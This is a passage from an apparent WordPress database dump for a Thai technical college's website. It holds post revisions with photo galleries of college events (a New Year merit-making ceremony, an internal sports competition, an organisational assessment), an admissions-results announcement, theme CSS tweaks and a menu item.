src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:14:14', '2018-01-06 09:14:14', '', 354, 'http://sim.technicrayong.ac.th/?p=373', 0, 'revision', '', 0),
(374, 1, '2018-01-06 16:15:29', '2018-01-06 09:15:29', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> \r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> \r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> \r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> \r\n\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:15:29', '2018-01-06 09:15:29', '', 354, 'http://sim.technicrayong.ac.th/?p=374', 0, 'revision', '', 0),
(375, 1, '2018-01-06 16:16:09', '2018-01-06 09:16:09', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-01-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-02-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-03-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-04-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-05-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-06-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-07-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a> <a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-08-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-09-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /> </a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/make-merit-old-year-2560-10-300x205.jpg\" alt=\"\" width=\"300\" height=\"205\" /></a></p>', 'คณะผู้บริหารวิทยาลัยเทคนิคระยอง พร้อมด้วยคณะครู บุคลากรทางการศึกษา และนักเรียน นักศึกษา ร่วมทำบุญตักบาตรข้าวสารอาหารแห้ง พระสงฆ์จากวัดลุ่มมหาชัยชุมพล จำนวน 19 รูป เนื่องในโอกาสวันขึ้นปีใหม่ ณ โดมหน้าองค์พระวิษณุกรรม วันที่ 27 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '354-revision-v1', '', '', '2018-01-06 16:16:09', '2018-01-06 09:16:09', '', 354, 'http://sim.technicrayong.ac.th/?p=375', 0, 'revision', '', 0),
(376, 1, '2018-01-06 16:17:41', '2018-01-06 09:17:41', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-01-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-02-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-03-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-04-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-05-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-06-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-07-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-08-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-09-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/audit-avt-2-2560-10-300x223.jpg\" alt=\"\" width=\"300\" height=\"223\" /></a></p>', 'วิทยาลัยเทคนิคระยอง เข้ารับการประเมินองค์การมาตรฐานดีเด่น องค์การนักวิชาชีพในอนาคตแห่งประเทศไทย ระดับสถานศึกษาขนาดใหญ่ ระดับภาค ภาคตะวันออกและกรุงเทพมหานคร ประจำปีการศึกษา 2560 (รอบสอง) วันที่ 25 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '342-revision-v1', '', '', '2018-01-06 16:17:41', '2018-01-06 09:17:41', '', 342, 'http://sim.technicrayong.ac.th/?p=376', 0, 'revision', '', 0),
(378, 1, '2018-01-06 16:19:59', '2018-01-06 09:19:59', '<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-12-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-13-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-14-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-15-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-16-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-17-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-18-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\">\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-19-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-20-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560', '', 'inherit', 'closed', 'closed', '', '320-revision-v1', '', '', '2018-01-06 16:19:59', '2018-01-06 09:19:59', '', 320, 'http://sim.technicrayong.ac.th/?p=378', 0, 'revision', '', 0),
(380, 1, '2018-01-06 16:30:57', '2018-01-06 09:30:57', '\n#main-slider::before {\nbackground: none;\n}\n\n#main-slider::after {\nbackground: none;\n}\n', 'university-hub-pro', '', 'publish', 'closed', 'closed', '', 'university-hub-pro', '', '', '2018-01-19 13:18:26', '2018-01-19 06:18:26', '', 0, 'http://sim.technicrayong.ac.th/?p=380', 0, 'custom_css', '', 0),
(381, 1, '2018-01-06 16:30:57', '2018-01-06 09:30:57', '#header-social .university_hub_widget_social ul li a:hover::before {\n color: #1e73be;\n}\n\n#header-social .university_hub_widget_social ul li a::before {\n color: #660000;\n}', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 16:30:57', '2018-01-06 09:30:57', '', 380, 'http://sim.technicrayong.ac.th/?p=381', 0, 'revision', '', 0),
(383, 1, '2018-01-06 16:31:23', '2018-01-06 09:31:23', '', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 16:31:23', '2018-01-06 09:31:23', '', 380, 'http://sim.technicrayong.ac.th/?p=383', 0, 'revision', '', 0),
(384, 1, '2018-01-06 16:43:04', '2018-01-06 09:43:04', '', 'Facebook', '', 'publish', 'closed', 'closed', '', 'f', '', '', '2018-01-06 16:44:36', '2018-01-06 09:44:36', '', 0, 'http://sim.technicrayong.ac.th/?p=384', 1, 'nav_menu_item', '', 0),
(397, 1, '2018-01-06 20:37:27', '2018-01-06 13:37:27', '.home-section-news-and-events .news-post:nth-child(2n+1) {\n clear: none;\n}\n\n.home-section-news-and-events .news-post {\n width: 33%;\n}\n\n.home-section-news-and-events .recent-news {\n width: 100%;\n}\n\n.home-section-news-and-events .recent-events {\n display: none;\n}', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 20:37:27', '2018-01-06 13:37:27', '', 380, 'http://sim.technicrayong.ac.th/?p=397', 0, 'revision', '', 0),
(399, 1, '2018-01-06 20:38:56', '2018-01-06 13:38:56', '', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 20:38:56', '2018-01-06 13:38:56', '', 380, 'http://sim.technicrayong.ac.th/?p=399', 0, 'revision', '', 0),
(401, 1, '2018-01-06 20:44:30', '2018-01-06 13:44:30', '.home-section-news-and-events .news-post:nth-child(2n+1) {\n clear: none;\n}\n\n.home-section-news-and-events .news-post {\n width: 33%;\n}\n\n.home-section-news-and-events .recent-news {\n width: 100%;\n}\n\n.home-section-news-and-events .recent-events {\n width: 100%;\n}', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 20:44:30', '2018-01-06 13:44:30', '', 380, 'http://sim.technicrayong.ac.th/?p=401', 0, 'revision', '', 0),
(403, 1, '2018-01-06 20:48:11', '2018-01-06 13:48:11', '', 'university-hub-pro', '', 'inherit', 'closed', 'closed', '', '380-revision-v1', '', '', '2018-01-06 20:48:11', '2018-01-06 13:48:11', '', 380, 'http://sim.technicrayong.ac.th/?p=403', 0, 'revision', '', 0),
(406, 1, '2018-01-06 21:06:08', '2018-01-06 14:06:08', '<h4>ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561</h4>\r\n<h4><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา', '', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 21:06:08', '2018-01-06 14:06:08', '', 287, 'http://sim.technicrayong.ac.th/?p=406', 0, 'revision', '', 0),
(419, 1, '2018-01-06 21:38:50', '2018-01-06 14:38:50', '<h4>ประกาศผลการคัดเลือกนักศึกษาโควตา หลักสูตรประกาศนียบัตรวิชาชีพ (ปวช.) และหลักสูตรประกาศนียบัตรวิชาชีพชั้นสูง (ปวส.) ปีการศึกษา 2561</h4>\r\n<h4><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายใน</a>\r\n<a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก.pdf\">ผลการคัดเลือกโควตา-2561-นักเรียน-นักศึกษา-ภายนอก</a></h4>\r\n<img class=\"aligncenter size-large wp-image-294\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-01-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-293\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-02-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" /> <img class=\"aligncenter size-large wp-image-292\" src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/การสมัครออนไลน์-03-725x1024.jpg\" alt=\"\" width=\"640\" height=\"904\" />', 'ประกาศผลการคัดเลือกนักศึกษาโควตา', 'ปีการศึกษา 2561 ...', 'inherit', 'closed', 'closed', '', '287-revision-v1', '', '', '2018-01-06 21:38:50', '2018-01-06 14:38:50', '', 287, 'http://sim.technicrayong.ac.th/?p=419', 0, 'revision', '', 0),
(420, 1, '2018-01-06 21:39:56', '2018-01-06 14:39:56', 'กิจกรรมแข่งขันกีฬาภายในสถานศึกษา \"เทคนิคระยองเกมส์\" ประจำปีการศึกษา 2560 ระหว่างวันที่ 14-24 ธันวาคม 2560 และกิจกรรมพิธีเปิด-ปิด ในวันอาทิตย์ที่ 24 ธันวาคม 2560\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-01-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-02-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-03-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-04-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-05-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-06-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-07-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-08-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-09-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-10-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a></p>\r\n<p style=\"text-align: center;\"><a href=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11.jpg\"><img src=\"http://sim.technicrayong.ac.th/wp-content/uploads/2018/01/rtc-sport-2560-11-300x191.jpg\" alt=\"\" width=\"300\" height=\"191\" /></a><a 